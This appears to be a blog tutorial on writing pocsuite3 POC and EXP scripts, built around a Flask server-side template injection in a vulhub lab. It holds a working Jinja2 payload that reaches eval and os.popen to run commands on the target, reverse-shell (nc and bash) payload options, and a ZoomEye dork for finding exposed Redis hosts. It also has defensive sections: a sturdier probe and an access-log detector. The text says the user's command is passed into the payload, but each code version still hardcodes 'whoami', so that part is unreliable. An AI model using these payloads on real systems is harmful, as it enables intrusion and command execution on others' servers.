Author: guko

pocsuite is a remote vulnerability verification framework built around vulnerabilities and POCs. This post records its basic usage and my notes from learning to write POC and EXP scripts for it.
0x01 Installation

Download and unzip it directly:

```shell
wget https://github.com/knownsec/pocsuite3/archive/master.zip
unzip master.zip
```
0x02 Usage

Pocsuite has two interaction modes: a command-line mode and an interactive console mode. The --verify option calls the POC's verify method to check whether the target is vulnerable; the --attack option calls the attack method to launch an attack against the target.

1. Verify mode: check whether the target is vulnerable. -r is the script path, -u the target address.

```shell
python3 pocsuite.py -r pocs/test1.py -u url --verify
```

2. Batch verification: write all target IPs to be checked into a txt file and test them in bulk.

```shell
python3 pocsuite.py -r pocs/test1.py -u url.txt --verify
```

3. Load every POC in a folder and run all of them against the target; -r is then the folder path.

```shell
python3 pocsuite.py -r pocs/* -u url --verify
```

4. Use multiple threads; --threads sets the number of threads.

```shell
python3 pocsuite.py -r pocs/test1.py -u url --verify --threads 10
```

5. Use the ZoomEye search engine to find Redis services with port 6379 open.

```shell
python3 cli.py --dork 'port:6379' --vul-keyword 'redis' --max-page 2
```

6. Attack mode: launch an attack against the target.

```shell
python3 pocsuite.py -r pocs/test1.py -u url --attack
```

7. Interactive shell mode: control the target remotely.

```shell
python3 pocsuite.py -r pocs/test1.py -u url --shell
```

8. Use the custom 'command' option to pass an argument in from the command line for semi-interactive command execution.

```shell
python3 pocsuite.py -r pocs/test1.py -u url --attack --command "whoami"
```
0x03 Writing the POC script

Setting up the Flask template environment

Here the environment is brought up quickly with the VULHUB one at https://github.com/vulhub/vulhub/tree/master/flask/ssti:

```shell
docker-compose build
docker-compose up -d
```
In practice, replacing the template's _verify method with the Flask vulnerability detection code completes the POC:

```python
#!/usr/bin/python3
# Create a new .py file that follows the POC naming convention
# Write the POC implementation class DemoPOC, which inherits from POCBase
from collections import OrderedDict
from urllib.parse import urljoin
import re
from pocsuite3.api import POCBase, Output, register_poc, logger, requests, OptDict, VUL_TYPE
from pocsuite3.api import REVERSE_PAYLOAD, POC_CATEGORY


class DemoPOC(POCBase):
    vulID = '1.1'
    version = '1.1'
    author = ['1.1']  # POC author
    vulDate = '1.1'  # date the vulnerability was disclosed
    updateDate = '1.1'  # date the POC was written
    references = ['flask']  # source of the vulnerability information
    name = 'flask'  # POC name
    appPowerLink = 'flask'  # vendor homepage
    appName = 'flask'  # affected application
    appVersion = '1.1'  # affected versions
    vulType = ''  # vulnerability type
    desc = '''
    test
    '''  # short description of the vulnerability
    samples = ['00.00.00.00:8000']  # test samples: sites the POC was verified against
    install_requires = []

    # Verify mode: put the POC detection logic in _verify
    def _verify(self):
        result = {}
        path = "/?name="
        url = self.url + path
        payload = "{{22*22}}"  # arithmetic probe: a rendered 484 means the input was evaluated as a template
        try:
            resq = requests.get(url + payload)
            if resq and resq.status_code == 200 and "484" in resq.text:
                result['VerifyInfo'] = {}
                result['VerifyInfo']['URL'] = url
                result['VerifyInfo']['name'] = payload
        except Exception as e:
            pass
        return self.parse_output(result)

    @staticmethod
    def trim(s):
        """Remove every space from a string (helper, not used by this POC)."""
        newstr = ''
        for ch in s:  # iterate over every character
            if ch != ' ':
                newstr = newstr + ch
        return newstr

    # Attack mode: put the EXP exploit code in _attack(); in attack mode you do not have to get
    # a shell on the target, you can also do things like query the administrator's credentials
    def _attack(self):
        result = {}
        # exploit code goes here
        return self.parse_attack(result)

    def parse_attack(self, result):
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail('target is not vulnerable')
        return output

    def _shell(self):
        return

    def parse_output(self, result):
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail('target is not vulnerable')
        return output


register_poc(DemoPOC)
```
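The `{{22*22}}` check in `_verify` above keys on a fixed number, so any page that already contains "484" produces a false positive, and it cannot tell an evaluated template apart from an application that merely echoes the input. The following is an added example, not code from this post or from pocsuite3, that makes the same probe more reliable: a random pair of factors, a baseline request to rule out the product occurring naturally, and a separate verdict for reflected input. The `fetch` callback and the two fake apps are constructed stand-ins for the vulhub target so that the whole thing runs offline.

```python
import random
import re
from urllib.parse import parse_qs, quote, urlparse


def build_probe(rng=None):
    """Return (payload, expected_output) for an arithmetic SSTI probe.

    Two three-digit factors are drawn at random so the product is very unlikely
    to occur on the page by accident, unlike the fixed {{22*22}} -> 484 check.
    """
    rng = rng or random.Random()
    a, b = rng.randint(100, 999), rng.randint(100, 999)
    return "{{%d*%d}}" % (a, b), str(a * b)


def detect_ssti(baseline_body, probe_body, payload, expected):
    """Classify the target from two responses.

    baseline_body: response to a harmless value (e.g. name=guest)
    probe_body:    response to the arithmetic probe
    Returns 'vulnerable', 'reflected', 'inconclusive' or 'not_vulnerable'.
    """
    if expected in baseline_body:
        # the product already appears on the page; the probe proves nothing
        return "inconclusive"
    if payload in probe_body:
        # raw template syntax echoed back: the input was not rendered as a template
        return "reflected"
    # match the product as a whole number only, not as part of a longer digit run
    if re.search(r"(?<!\d)%s(?!\d)" % re.escape(expected), probe_body):
        return "vulnerable"
    return "not_vulnerable"


def probe_target(fetch, base_url, param="name", rng=None):
    """Run the two-request check through a caller-supplied fetch(url) -> body.

    In a POC, fetch would wrap requests.get(url).text; injecting it keeps this
    example runnable without a network.
    """
    payload, expected = build_probe(rng)
    baseline = fetch("%s/?%s=%s" % (base_url, param, quote("guest")))
    probed = fetch("%s/?%s=%s" % (base_url, param, quote(payload)))
    return detect_ssti(baseline, probed, payload, expected)


# --- constructed stand-ins for a target, used only to exercise the detector ---
_ARITH = re.compile(r"\{\{(\d+)\*(\d+)\}\}")


def _name_param(url):
    return parse_qs(urlparse(url).query).get("name", ["guest"])[0]


def fake_vulnerable_app(url):
    """Hypothetical app that concatenates ?name= into the template source. Only
    the arithmetic expression is evaluated here, which is all the probe needs."""
    rendered = _ARITH.sub(lambda m: str(int(m.group(1)) * int(m.group(2))), _name_param(url))
    return "Hello " + rendered


def fake_safe_app(url):
    """Hypothetical app that passes ?name= to the template as a variable, so
    template syntax in the input comes back as literal text."""
    return "Hello " + _name_param(url)


if __name__ == "__main__":
    print("vulnerable app:", probe_target(fake_vulnerable_app, "http://127.0.0.1:8000"))
    print("safe app:      ", probe_target(fake_safe_app, "http://127.0.0.1:8000"))
```

Inside a POC, `fetch` would be `lambda u: requests.get(u).text` and `probe_target` would be called from `_verify`; a "reflected" verdict is the one to record as not vulnerable but worth a look, since the input reached the page unescaped. The safe stand-in models the application-side fix: user input is passed to the template as a variable, never concatenated into the template source.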
0x04 Writing the EXP script

Writing an EXP is the same as writing a POC; only the _attack part needs to be replaced with the exploit code.

```python
    def _attack(self):
        result = {}
        path = "/?name="
        url = self.url + path
        # the command is fixed to whoami here; path already carries the name= parameter
        payload = '''{% for c in [].__class__.__base__.__subclasses__() %}
{% if c.__name__ == 'catch_warnings' %}
  {% for b in c.__init__.__globals__.values() %}
  {% if b.__class__ == {}.__class__ %}
    {% if 'eval' in b.keys() %}
      {{ b['eval']('__import__("os").popen("whoami").read()') }}
    {% endif %}
  {% endif %}
  {% endfor %}
{% endif %}
{% endfor %}'''
        try:
            resq = requests.get(url + payload)
            # "www" in the response (whoami returning www-data) is taken as proof the command ran
            if resq and resq.status_code == 200 and "www" in resq.text:
                result['VerifyInfo'] = {}
                result['VerifyInfo']['URL'] = url
                result['VerifyInfo']['name'] = payload
        except Exception as e:
            pass
        return self.parse_output(result)
```

That completes the EXP. Run it as follows:

```shell
python3 cli.py -r pocs/exp_flask.py -u http://127.0.0.1:8000 --attack
```
    
In Pocsuite3 a POC can accept command-line arguments from the user for semi-interactive control of the target system. First, write a function that accepts the custom command and assigns the received value to the command option:

```python
    def _options(self):
        o = OrderedDict()
        payload = {
            "nc": REVERSE_PAYLOAD.NC,
            "bash": REVERSE_PAYLOAD.BASH,
        }
        o["command"] = OptDict(selected="bash", default=payload)
        return o
```
Next, create a cmd variable that receives the command the user passes in the command option and embed it in the payload string. Concatenate the finished payload with the URL and send it to the target with requests; the command runs on the target system and its output is returned:

```python
    def _attack(self):
        result = {}
        path = "/?name="
        url = self.url + path
        # the command is fixed to whoami here; path already carries the name= parameter
        payload = '''{% for c in [].__class__.__base__.__subclasses__() %}
{% if c.__name__ == 'catch_warnings' %}
  {% for b in c.__init__.__globals__.values() %}
  {% if b.__class__ == {}.__class__ %}
    {% if 'eval' in b.keys() %}
      {{ b['eval']('__import__("os").popen("whoami").read()') }}
    {% endif %}
  {% endif %}
  {% endfor %}
{% endif %}
{% endfor %}'''
        try:
            resq = requests.get(url + payload)
            t = resq.text
            # strip the line breaks and spaces the template loops leave around the output
            t = t.replace('\n', '').replace('\r', '')
            print(t)
            t = t.replace(" ", "")
            if resq and resq.status_code == 200 and "www" in resq.text:
                result['VerifyInfo'] = {}
                result['VerifyInfo']['URL'] = url
                result['VerifyInfo']['name'] = t
        except Exception as e:
            pass
        return self.parse_output(result)
```
The finished code:

```python
#!/usr/bin/python3
from collections import OrderedDict
from urllib.parse import urljoin
import re
from pocsuite3.api import POCBase, Output, register_poc, logger, requests, OptDict, VUL_TYPE
from pocsuite3.api import REVERSE_PAYLOAD, POC_CATEGORY


class DemoPOC(POCBase):
    vulID = '1.1'
    version = '1.1'
    author = ['1.1']  # POC author
    vulDate = '1.1'  # date the vulnerability was disclosed
    updateDate = '1.1'  # date the POC was written
    references = ['flask']  # source of the vulnerability information
    name = 'flask'  # POC name
    appPowerLink = 'flask'  # vendor homepage
    appName = 'flask'  # affected application
    appVersion = '1.1'  # affected versions
    vulType = ''  # vulnerability type
    desc = '''
        test
        '''  # short description of the vulnerability
    samples = ['00.00.00.00:8000']  # test samples: sites the POC was verified against
    install_requires = []

    def _options(self):
        o = OrderedDict()
        payload = {
            "nc": REVERSE_PAYLOAD.NC,
            "bash": REVERSE_PAYLOAD.BASH,
        }
        o["command"] = OptDict(selected="bash", default=payload)
        return o

    def _verify(self):
        result = {}
        path = "/?name="
        url = self.url + path
        payload = "{{22*22}}"  # arithmetic probe: a rendered 484 means the input was evaluated as a template
        try:
            resq = requests.get(url + payload)
            if resq and resq.status_code == 200 and "484" in resq.text:
                result['VerifyInfo'] = {}
                result['VerifyInfo']['URL'] = url
                result['VerifyInfo']['name'] = payload
        except Exception as e:
            pass
        return self.parse_output(result)

    def _attack(self):
        result = {}
        path = "/?name="
        url = self.url + path
        # the command is fixed to whoami here; path already carries the name= parameter
        payload = '''{% for c in [].__class__.__base__.__subclasses__() %}
{% if c.__name__ == 'catch_warnings' %}
  {% for b in c.__init__.__globals__.values() %}
  {% if b.__class__ == {}.__class__ %}
    {% if 'eval' in b.keys() %}
      {{ b['eval']('__import__("os").popen("whoami").read()') }}
    {% endif %}
  {% endif %}
  {% endfor %}
{% endif %}
{% endfor %}'''
        try:
            resq = requests.get(url + payload)
            t = resq.text
            # strip the line breaks and spaces the template loops leave around the output
            t = t.replace('\n', '').replace('\r', '')
            print(t)
            t = t.replace(" ", "")
            if resq and resq.status_code == 200 and "www" in resq.text:
                result['VerifyInfo'] = {}
                result['VerifyInfo']['URL'] = url
                result['VerifyInfo']['name'] = t
        except Exception as e:
            pass
        return self.parse_output(result)

    def parse_attack(self, result):
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail('target is not vulnerable')
        return output

    def _shell(self):
        return

    def parse_output(self, result):
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail('target is not vulnerable')
        return output


register_poc(DemoPOC)
```

Run:

```shell
python3 cli.py -r pocs/exp_flask.py -u http://127.0.0.1:8000 --attack --command 'id'
```
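The query strings the POC and EXP above send (the `{{22*22}}` probe and the `{% for ... %}` subclass walk) are exactly what a defender sees in the web server's access log. As an added example that is not part of the original post, here is a small scanner that decodes the query string of each request line and grades it by the patterns it matches. The log lines are constructed for this example and the severity thresholds are my own assumption; the patterns themselves are the Jinja2 delimiters and dunder attributes that appear in the payloads on this page.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Constructed access-log lines (combined format). The 10.0.0.7 requests carry the
# arithmetic probe, the subclasses walk and the eval/popen call shown on this page.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /?name=guest HTTP/1.1" 200 120 "-" "Mozilla/5.0"
10.0.0.7 - - [01/Jan/2024:10:00:02 +0000] "GET /?name=%7B%7B22*22%7D%7D HTTP/1.1" 200 118 "-" "python-requests"
10.0.0.7 - - [01/Jan/2024:10:00:03 +0000] "GET /?name=%7B%25%20for%20c%20in%20%5B%5D.__class__.__base__.__subclasses__()%20%25%7D HTTP/1.1" 200 3200 "-" "python-requests"
10.0.0.7 - - [01/Jan/2024:10:00:04 +0000] "GET /?name=%7B%7B%20b%5B%27eval%27%5D(%27__import__(%22os%22).popen(%22id%22).read()%27)%20%7D%7D HTTP/1.1" 200 130 "-" "python-requests"
10.0.0.9 - - [01/Jan/2024:10:00:05 +0000] "GET /?name=%7B%7Bname%7D%7D HTTP/1.1" 200 118 "-" "curl"
"""

LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})')

# Jinja2 expression / statement delimiters: legitimate users do not type these.
TEMPLATE_SYNTAX = re.compile(r"\{\{.*?\}\}|\{%.*?%\}", re.S)
# Introspection attributes used to walk from a literal to os, eval or builtins.
DUNDER = re.compile(r"__(class|base|mro|subclasses|globals|builtins|import|init)__")
# Direct signs of code or command execution inside the template.
EXEC_HINT = re.compile(r"\b(popen|eval|exec|system|subprocess)\b")

SEVERITY_ORDER = {"probe": 1, "high": 2, "critical": 3}


def classify(decoded):
    """Grade one decoded query value; returns (severity or None, rules hit)."""
    hits = [name for name, rx in (("template_syntax", TEMPLATE_SYNTAX),
                                  ("dunder_introspection", DUNDER),
                                  ("exec_hint", EXEC_HINT)) if rx.search(decoded)]
    # an exec word on its own (e.g. ?q=eval) is ordinary text; require template evidence
    if "template_syntax" not in hits and "dunder_introspection" not in hits:
        return None, []
    if "exec_hint" in hits:
        return "critical", hits
    if "dunder_introspection" in hits:
        return "high", hits
    return "probe", hits


def scan_log(text):
    """Return one finding per request whose query string looks like SSTI."""
    findings = []
    for raw in text.splitlines():
        m = LOG_LINE.match(raw)
        if not m:
            continue
        # parse_qsl percent-decodes each value once; all values are joined so the
        # pattern checks see the whole input regardless of the parameter name
        pairs = parse_qsl(urlsplit(m.group("target")).query, keep_blank_values=True)
        decoded = " ".join(value for _, value in pairs)
        severity, hits = classify(decoded)
        if severity:
            findings.append({"ip": m.group("ip"), "time": m.group("ts"),
                             "severity": severity, "rules": hits, "input": decoded})
    return findings


def worst_by_source(findings):
    """Collapse findings to the highest severity seen per source address."""
    worst = {}
    for f in findings:
        if SEVERITY_ORDER[f["severity"]] > SEVERITY_ORDER.get(worst.get(f["ip"]), 0):
            worst[f["ip"]] = f["severity"]
    return worst


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f["severity"].upper(), f["ip"], f["input"])
    print(worst_by_source(scan_log(SAMPLE_LOG)))
```

A single "probe" hit from a source is worth a look; the escalation from probe to a dunder walk to an eval/popen call within seconds from one address, as in the constructed lines above, is the sequence the EXP in this post produces and is what an alert should key on.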
    
References

python安全攻防渗透测试实战指南 (Python Security Offense and Defense: A Practical Guide to Penetration Testing)

That concludes the walkthrough of Pocsuite. Follow the 至察助安 WeChat public account for more quality cybersecurity content.